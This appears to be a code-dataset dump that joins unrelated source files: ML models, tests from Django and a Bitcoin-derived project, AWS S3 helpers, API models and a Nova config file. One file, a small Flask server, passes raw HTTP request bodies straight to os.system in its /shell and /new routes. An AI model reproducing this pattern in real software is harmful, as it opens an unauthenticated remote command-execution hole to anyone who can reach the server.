tokens = tokenizer.tokenize("USA is United States of America")
expected = ["us", "a</w>", "is</w>", "un", "i", "ted</w>", "st", "ates</w>", "of</w>", "am", "er", "ica</w>"]
self.assertListEqual(tokens, expected)
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_torch_encode_plus_sent_to_model(self):
pass
@unittest.skip("FSMTConfig.__init__ requires non-optional args")
def test_np_encode_plus_sent_to_model(self):
pass
| 38.071429 | 141 | 0.635241 | [
"Apache-2.0"
] | DATEXIS/adapter-transformers | tests/test_tokenization_fsmt.py | 6,396 | Python |
from django.db import models
from django.test import SimpleTestCase
from .models import Book, ChildModel1, ChildModel2
class IndexesTests(SimpleTestCase):
def test_suffix(self):
self.assertEqual(models.Index.suffix, 'idx')
def test_repr(self):
index = models.Index(fields=['title'])
multi_col_index = models.Index(fields=['title', 'author'])
self.assertEqual(repr(index), "<Index: fields='title'>")
self.assertEqual(repr(multi_col_index), "<Index: fields='title, author'>")
def test_eq(self):
index = models.Index(fields=['title'])
same_index = models.Index(fields=['title'])
another_index = models.Index(fields=['title', 'author'])
index.model = Book
same_index.model = Book
another_index.model = Book
self.assertEqual(index, same_index)
self.assertNotEqual(index, another_index)
def test_index_fields_type(self):
with self.assertRaisesMessage(ValueError, 'Index.fields must be a list.'):
models.Index(fields='title')
def test_raises_error_without_field(self):
msg = 'At least one field is required to define an index.'
with self.assertRaisesMessage(ValueError, msg):
models.Index()
def test_max_name_length(self):
msg = 'Index names cannot be longer than 30 characters.'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='looooooooooooong_index_name_idx')
def test_name_constraints(self):
msg = 'Index names cannot start with an underscore (_).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='_name_starting_with_underscore')
msg = 'Index names cannot start with a number (0-9).'
with self.assertRaisesMessage(ValueError, msg):
models.Index(fields=['title'], name='5name_starting_with_number')
def test_name_auto_generation(self):
index = models.Index(fields=['author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_0f5565_idx')
# '-' for DESC columns should be accounted for in the index name.
index = models.Index(fields=['-author'])
index.set_name_with_model(Book)
self.assertEqual(index.name, 'model_index_author_708765_idx')
# fields may be truncated in the name. db_column is used for naming.
long_field_index = models.Index(fields=['pages'])
long_field_index.set_name_with_model(Book)
self.assertEqual(long_field_index.name, 'model_index_page_co_69235a_idx')
# suffix can't be longer than 3 characters.
long_field_index.suffix = 'suff'
msg = 'Index too long for multiple database support. Is self.suffix longer than 3 characters?'
with self.assertRaisesMessage(AssertionError, msg):
long_field_index.set_name_with_model(Book)
def test_deconstruction(self):
index = models.Index(fields=['title'])
index.set_name_with_model(Book)
path, args, kwargs = index.deconstruct()
self.assertEqual(path, 'django.db.models.Index')
self.assertEqual(args, ())
self.assertEqual(kwargs, {'fields': ['title'], 'name': 'model_index_title_196f42_idx'})
def test_clone(self):
index = models.Index(fields=['title'])
new_index = index.clone()
self.assertIsNot(index, new_index)
self.assertEqual(index.fields, new_index.fields)
def test_abstract_children(self):
index_names = [index.name for index in ChildModel1._meta.indexes]
self.assertEqual(index_names, ['model_index_name_440998_idx'])
index_names = [index.name for index in ChildModel2._meta.indexes]
self.assertEqual(index_names, ['model_index_name_b6c374_idx'])
| 42.362637 | 102 | 0.679377 | [
"Apache-2.0"
] | HSunboy/hue | desktop/core/ext-py/Django-1.11/tests/model_indexes/tests.py | 3,855 | Python |
import urllib.request as ul
import json
import pandas as pd
def get_chart(ticker, period1, period2):
url = f"http://localhost:9000/chart/{ticker}?period1={period1}&period2={period2}"
request = ul.Request(url)
response = ul.urlopen(request)
rescode = response.getcode()
if rescode != 200:
return None
responsedata = response.read()
my_json = responsedata.decode('utf8').replace("'", '"')
data = json.loads(my_json)
return data["data"]["history"]
info = get_chart("aaa", 20211015, 20211104)
df = pd.json_normalize(info)
df.to_csv("aaa_chart.csv")
print(df)
| 21.714286 | 85 | 0.674342 | [
"MIT"
] | SHSongs/EFT | client/main.py | 608 | Python |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
from time import time
import tensorflow as tf
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
class ProductNN(BaseEstimator, TransformerMixin):
def __init__(self, feature_size, field_size, embedding_size=8,
deep_layers=None, deep_init_size=50, dropout_deep=None,
deep_layer_activation=tf.nn.relu, epoch=10, batch_size=256,
learning_rate=0.001, optimizer="adam", batch_norm=0,
batch_norm_decay=0.995, verbose=False, random_seed=2016,
loss_type="logloss", eval_metric=roc_auc_score,
greater_is_better=True, use_inner=True):
assert loss_type in ["logloss", "mse"],\
"loss_type can be either 'logloss' for classification task or 'mse' for regression task"
if deep_layers is None:
deep_layers = [32, 32]
if dropout_deep is None:
dropout_deep = [0.5, 0.5, 0.5]
self.feature_size = feature_size
self.field_size = field_size
self.embedding_size = embedding_size
self.deep_layers = deep_layers
self.deep_init_size = deep_init_size
self.dropout_dep = dropout_deep
self.deep_layers_activation = deep_layer_activation
self.epoch = epoch
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer_type = optimizer
self.batch_norm = batch_norm
self.batch_norm_decay = batch_norm_decay
self.verbose = verbose
self.random_seed = random_seed
self.loss_type = loss_type
self.greater_is_better = greater_is_better
self.train_result, self.valid_result = [], []
self.use_inner = use_inner
self._init_graph()
def _init_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(self.random_seed)
# input data,模型输入
self.feat_index = tf.placeholder(tf.int32, shape=[None, None],
name='feat_index')
self.feat_value = tf.placeholder(tf.float32, shape=[None, None],
name='feat_value')
self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')
self.dropout_keep_deep = tf.placeholder(tf.float32, shape=[None],
name='dropout_deep_deep')
self.train_phase = tf.placeholder(tf.bool, name='train_phase')
# weight initializing,权重初始化
self.weights = self._initialize_weights()
# model
self.embeddings = tf.nn.embedding_lookup(self.weights['feature_embeddings'], self.feat_index)
feat_value = tf.reshape(self.feat_value, shape=[-1, self.field_size, 1])
self.embeddings = tf.multiply(self.embeddings, feat_value)
# linear signal
linear_output = []
for i in range(self.deep_init_size):
linear_output.append(tf.reshape(tf.reduce_sum(
tf.multiply(self.embeddings, self.weights['product-linear'][i]),
axis=[1, 2]), shape=(-1, 1)))
self.lz = tf.concat(linear_output, axis=1)
# quadratic signal
quadratic_output = []
if self.use_inner:
for i in range(self.deep_init_size):
theta = tf.multiply(
self.embeddings, tf.reshape(self.weights['product-quadratic-inner'][i], (1, -1, 1)))
quadratic_output.append(tf.reshape(
tf.norm(tf.reduce_sum(theta, axis=1), axis=1), shape=(-1, 1)))
else:
embedding_sum = tf.reduce_sum(self.embeddings, axis=1)
p = tf.matmul(tf.expand_dims(embedding_sum, 2), tf.expand_dims(embedding_sum, 1))
for i in range(self.deep_init_size):
theta = tf.multiply(p, tf.expand_dims(
self.weights['product-quadratic-outer'][i], 0))
quadratic_output.append(tf.reshape(
tf.reduce_sum(theta, axis=[1, 2]), shape=(-1, 1)))
self.lp = tf.concat(quadratic_output, axis=1)
self.y_deep = tf.nn.relu(tf.add(tf.add(self.lz, self.lp), self.weights['product-bias']))
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[0])
# deep part
for i in range(0, len(self.deep_layers)):
self.y_deep = tf.add(tf.matmul(self.y_deep, self.weights["layer_%d" % i]), self.weights["bias_%d" % i])
self.y_deep = self.deep_layers_activation(self.y_deep)
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[i+1])
self.out = tf.add(tf.matmul(self.y_deep, self.weights['output']), self.weights['output_bias'])
# loss,代价函数
if self.loss_type == "logloss":
self.out = tf.nn.sigmoid(self.out)
self.loss = tf.losses.log_loss(self.label, self.out)
elif self.loss_type == "mse":
self.loss = tf.nn.l2_loss(tf.subtract(self.label, self.out))
# optimizer,优化器选择
if self.optimizer_type == "adam":
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8).minimize(self.loss)
elif self.optimizer_type == "adagrad":
self.optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate,
initial_accumulator_value=1e-8).minimize(self.loss)
elif self.optimizer_type == "gd":
self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.learning_rate).minimize(self.loss)
elif self.optimizer_type == "momentum":
self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.learning_rate,
momentum=0.95).minimize(self.loss)
# init
self.saver = tf.train.Saver()
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
# number of params
total_parameters = 0
for variable in self.weights.values():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
if self.verbose > 0:
print("#params: %d" % total_parameters)
def _initialize_weights(self):
weights = dict()
# Sparse Features->Dense Embeddings weight initializing
# one-hot编码后输入到Embedding的权重矩阵初始化
weights['feature_embeddings'] = tf.Variable(tf.random_normal(
[self.feature_size, self.embedding_size], 0.0, 0.01), name='feature_embeddings')
weights['feature_bias'] = tf.Variable(tf.random_normal(
[self.feature_size, 1], 0.0, 1.0), name='feature_bias')
# Product Layers
if self.use_inner:
weights['product-quadratic-inner'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size], 0.0, 0.01))
else:
weights['product-quadratic-outer'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.embedding_size, self.embedding_size], 0.0, 0.01))
weights['product-linear'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size, self.embedding_size], 0.0, 0.01))
weights['product-bias'] = tf.Variable(tf.random_normal([self.deep_init_size, ], 0, 0, 1.0))
# Deep layers weight initializing,Xavier初始化
num_layer = len(self.deep_layers)
input_size = self.deep_init_size
glorot = np.sqrt(2.0/(input_size + self.deep_layers[0])) # var(w)=2/(nin+nout)
weights['layer_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(input_size, self.deep_layers[0])), dtype=np.float32)
weights['bias_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[0])), dtype=np.float32)
for i in range(1, num_layer):
glorot = np.sqrt(2.0 / (self.deep_layers[i - 1] + self.deep_layers[i]))
weights["layer_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[i - 1], self.deep_layers[i])),
dtype=np.float32) # layers[i-1] * layers[i]
weights["bias_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[i])),
dtype=np.float32) # 1 * layer[i]
# final concat projection layer
glorot = np.sqrt(2.0/(input_size + 1))
weights['output'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[-1], 1)), dtype=np.float32)
weights['output_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32)
return weights
# noinspection PyMethodMayBeStatic
def get_batch(self, xi, xv, y, batch_size, index):
start = index * batch_size
end = (index + 1) * batch_size
end = end if end < len(y) else len(y)
return xi[start:end], xv[start:end], [[y_] for y_ in y[start:end]]
# noinspection PyMethodMayBeStatic
def shuffle_in_unison_scary(self, a, b, c):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
np.random.set_state(rng_state)
np.random.shuffle(c)
def predict(self, xi, xv):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
out = self.sess.run(self.out, feed_dict=feed_dict)
return out
def evaluate(self, xi, xv, y):
y = [[y_] for y_ in y]
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
loss = self.sess.run([self.loss], feed_dict=feed_dict)
return loss
def fit_on_batch(self, xi, xv, y):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: self.dropout_dep,
self.train_phase: True}
loss, opt = self.sess.run([self.loss, self.optimizer], feed_dict=feed_dict)
return loss
def fit(self, xi_train, xv_train, y_train, xi_valid=None, xv_valid=None,
y_valid=None, early_stopping=False, refit=False):
"""
:param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
vali_j can be either binary (1/0, for binary/categorical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
"""
has_valid = xv_valid is not None
for epoch in range(self.epoch):
t1 = time()
# shuffle the dataset,打乱dataset顺序
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
# get batch data and fit them,获得batch数据并fit
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# evaluate training and validation dataset,评价train/valid dataset
train_result = self.evaluate(xi_train, xv_train, y_train)
self.train_result.append(train_result[0])
if has_valid:
valid_result = self.evaluate(xi_valid, xv_valid, y_valid)
self.valid_result.append(valid_result[0])
if self.verbose > 0 and epoch % self.verbose == 0:
if has_valid:
print("[%d] train-loss=%.4f, valid-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], valid_result[0], time() - t1))
else:
print("[%d] train-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], time() - t1))
if has_valid and early_stopping and self.training_termination(self.valid_result):
break
# fit a few more epoch on train+valid until result reaches the best_train_score
if has_valid and refit:
if self.greater_is_better:
best_valid_score = max(self.valid_result)
else:
best_valid_score = min(self.valid_result)
best_epoch = self.valid_result.index(best_valid_score)
best_train_score = self.train_result[best_epoch]
xi_train = xi_train + xi_valid
xv_train = xv_train + xv_valid
y_train = y_train + y_valid
for epoch in range(100):
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# check the model performance
train_result = self.evaluate(xi_train, xv_train, y_train)
ckp1 = abs(train_result - best_train_score) < 0.001
ckp2 = self.greater_is_better and train_result > best_train_score
ckp3 = (not self.greater_is_better) and train_result < best_train_score
if ckp1 or ckp2 or ckp3:
break
def training_termination(self, valid_result):
if len(valid_result) > 5:
if self.greater_is_better:
if valid_result[-1] < valid_result[-2] < valid_result[-3] < valid_result[-4] < valid_result[-5]:
return True
else:
if valid_result[-1] > valid_result[-2] > valid_result[-3] > valid_result[-4] > valid_result[-5]:
return True
return False
| 47.574924 | 120 | 0.577296 | [
"MIT"
] | Daniel1586/Initiative_RecSys | tutorials/chapter_05_ProductNN/ProductNN.py | 15,649 | Python |
# -*- coding: utf-8 -*-
"""
Created on Tue May 12 00:00:00 2020
@author: Shaji
"""
import boto3
import os
boto3.setup_default_session()
s3_client = boto3.client('s3')
def list_buckets(client=s3_client):
"""
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
"""
response = s3_client.list_buckets()
buckets=[]
for bucket in response['Buckets']:
buckets.append(bucket["Name"])
return buckets
def list_objects(bucket,prefix='',client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
return keys,list(dirs)
def download_dir(bucket, prefix, local_path, client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
local=local_path+bucket+'\\'
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
for d in dirs:
dest_pathname = os.path.join(local, d)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
for k in keys:
dest_pathname = os.path.join(local, k)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
client.download_file(bucket, k, dest_pathname)
| 33.035714 | 162 | 0.591712 | [
"MIT"
] | vkreat-tech/ctrl4bi | ctrl4bi/aws_connect.py | 2,775 | Python |
n1 = int(input('Digite um valor: '))
n2 = int(input('Digite outro valor: '))
s = n1 + n2
print('A soma entre {} e {} é igual a {}!'.format(n1, n2, s)) | 37.5 | 61 | 0.586667 | [
"MIT"
] | libaniaraujo/Python-Curso-em-Video | exe003.py | 151 | Python |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from submarine.experiment.configuration import Configuration
class KernelSpec(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"name": "str", "channels": "list[str]", "dependencies": "list[str]"}
attribute_map = {"name": "name", "channels": "channels", "dependencies": "dependencies"}
def __init__(
self, name=None, channels=None, dependencies=None, local_vars_configuration=None
): # noqa: E501
"""KernelSpec - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._name = None
self._channels = None
self._dependencies = None
self.discriminator = None
if name is not None:
self.name = name
if channels is not None:
self.channels = channels
if dependencies is not None:
self.dependencies = dependencies
@property
def name(self):
"""Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
"""
self._name = name
@property
def channels(self):
"""Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def dependencies(self):
"""Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._dependencies
@dependencies.setter
def dependencies(self, dependencies):
"""Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._dependencies = dependencies
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KernelSpec):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KernelSpec):
return True
return self.to_dict() != other.to_dict()
| 30.718919 | 289 | 0.608657 | [
"Apache-2.0"
] | KUAN-HSUN-LI/submarine | submarine-sdk/pysubmarine/submarine/experiment/models/kernel_spec.py | 5,683 | Python |
# Proton JS - Proton.py
# by Acropolis Point
# module imports
import os
import json
import time
from flask import Flask, jsonify, request, render_template
app = Flask(__name__)
@app.route('/new', methods=['POST'])
# new() function definition
def new():
os.system("python3 window.py " + request.get_data(as_text = True))
return 'OK'
@app.route('/shell', methods=['POST'])
# shell() function definition
def shell():
os.system(request.get_data(as_text = True))
return 'OK'
@app.route('/filesave', methods=['POST'])
def filesave():
theFile = open(request.get_data(as_text = True).split(", ")[1], "w+")
theFile.write(request.get_data(as_text = True).split(", ")[0])
return 'OK'
@app.route('/close', methods=['POST'])
def close():
theFile = open("output.json", "r+")
theFileParsed = json.load(theFile)
theFileParsed['close'] = request.get_data(as_text = True)
theFile.seek(0)
theFile.write(json.dumps(theFileParsed) + " ")
time.sleep(200)
theFile.write("{ \"close\": \"\" }")
return 'OK'
| 25.119048 | 73 | 0.648341 | [
"MPL-2.0",
"MPL-2.0-no-copyleft-exception"
] | acropolis-point/ProtonJS | server.py | 1,055 | Python |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Californiacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running californiacoind with the -rpcbind and -rpcallowip options."""
import socket
import sys
from test_framework.test_framework import CaliforniacoinTestFramework, SkipTest
from test_framework.util import *
from test_framework.netutil import *
class RPCBindTest(CaliforniacoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
self.nodes[0].rpchost = None
self.start_nodes([base_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
raise SkipTest("This test requires at least one non-loopback IPv4 interface.")
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("::1",1))
s.close
except OSError:
raise SkipTest("This test requires IPv6 support.")
self.log.info("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
self.run_bind_test([non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([non_loopback_ip], non_loopback_ip, defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], non_loopback_ip, defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| 45.422018 | 162 | 0.626742 | [
"MIT"
] | CaliforniaCoinCAC/californiacoin | test/functional/rpcbind_test.py | 4,951 | Python |
# needs:fix_opt_description
# needs:check_deprecation_status
# needs:check_opt_group_and_type
# needs:fix_opt_description_indentation
# needs:fix_opt_registration_consistency
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from oslo_config import cfg
from nova.conf import paths
# Downtime period in milliseconds
LIVE_MIGRATION_DOWNTIME_MIN = 100
# Step count
LIVE_MIGRATION_DOWNTIME_STEPS_MIN = 3
# Delay in seconds
LIVE_MIGRATION_DOWNTIME_DELAY_MIN = 10
libvirt_group = cfg.OptGroup("libvirt",
title="Libvirt Options",
help="""
Libvirt options allows cloud administrator to configure related
libvirt hypervisor driver to be used within an OpenStack deployment.
Almost all of the libvirt config options are influence by ``virt_type`` config
which describes the virtualization type (or so called domain type) libvirt
should use for specific features such as live migration, snapshot.
""")
libvirt_general_opts = [
cfg.StrOpt('rescue_image_id',
help="""
The ID of the image to boot from to rescue data from a corrupted instance.
If the rescue REST API operation doesn't provide an ID of an image to
use, the image which is referenced by this ID is used. If this
option is not set, the image from the instance is used.
Possible values:
* An ID of an image or nothing. If it points to an *Amazon Machine
Image* (AMI), consider to set the config options ``rescue_kernel_id``
and ``rescue_ramdisk_id`` too. If nothing is set, the image of the instance
is used.
Related options:
* ``rescue_kernel_id``: If the chosen rescue image allows the separate
definition of its kernel disk, the value of this option is used,
if specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
* ``rescue_ramdisk_id``: If the chosen rescue image allows the separate
definition of its RAM disk, the value of this option is used if,
specified. This is the case when *Amazon*'s AMI/AKI/ARI image
format is used for the rescue image.
"""),
cfg.StrOpt('rescue_kernel_id',
help="""
The ID of the kernel (AKI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its kernel
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of an kernel image or nothing. If nothing is specified, the kernel
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_kernel_id`` too.
"""),
cfg.StrOpt('rescue_ramdisk_id',
help="""
The ID of the RAM disk (ARI) image to use with the rescue image.
If the chosen rescue image allows the separate definition of its RAM
disk, the value of this option is used, if specified. This is the case
when *Amazon*'s AMI/AKI/ARI image format is used for the rescue image.
Possible values:
* An ID of a RAM disk image or nothing. If nothing is specified, the RAM
disk from the instance is used if it was launched with one.
Related options:
* ``rescue_image_id``: If that option points to an image in *Amazon*'s
AMI/AKI/ARI image format, it's useful to use ``rescue_ramdisk_id`` too.
"""),
cfg.StrOpt('virt_type',
default='kvm',
choices=('kvm', 'lxc', 'qemu', 'uml', 'xen', 'parallels'),
help="""
Describes the virtualization type (or so called domain type) libvirt should
use.
The choice of this type must match the underlying virtualization strategy
you have chosen for this host.
Possible values:
* See the predefined set of case-sensitive values.
Related options:
* ``connection_uri``: depends on this
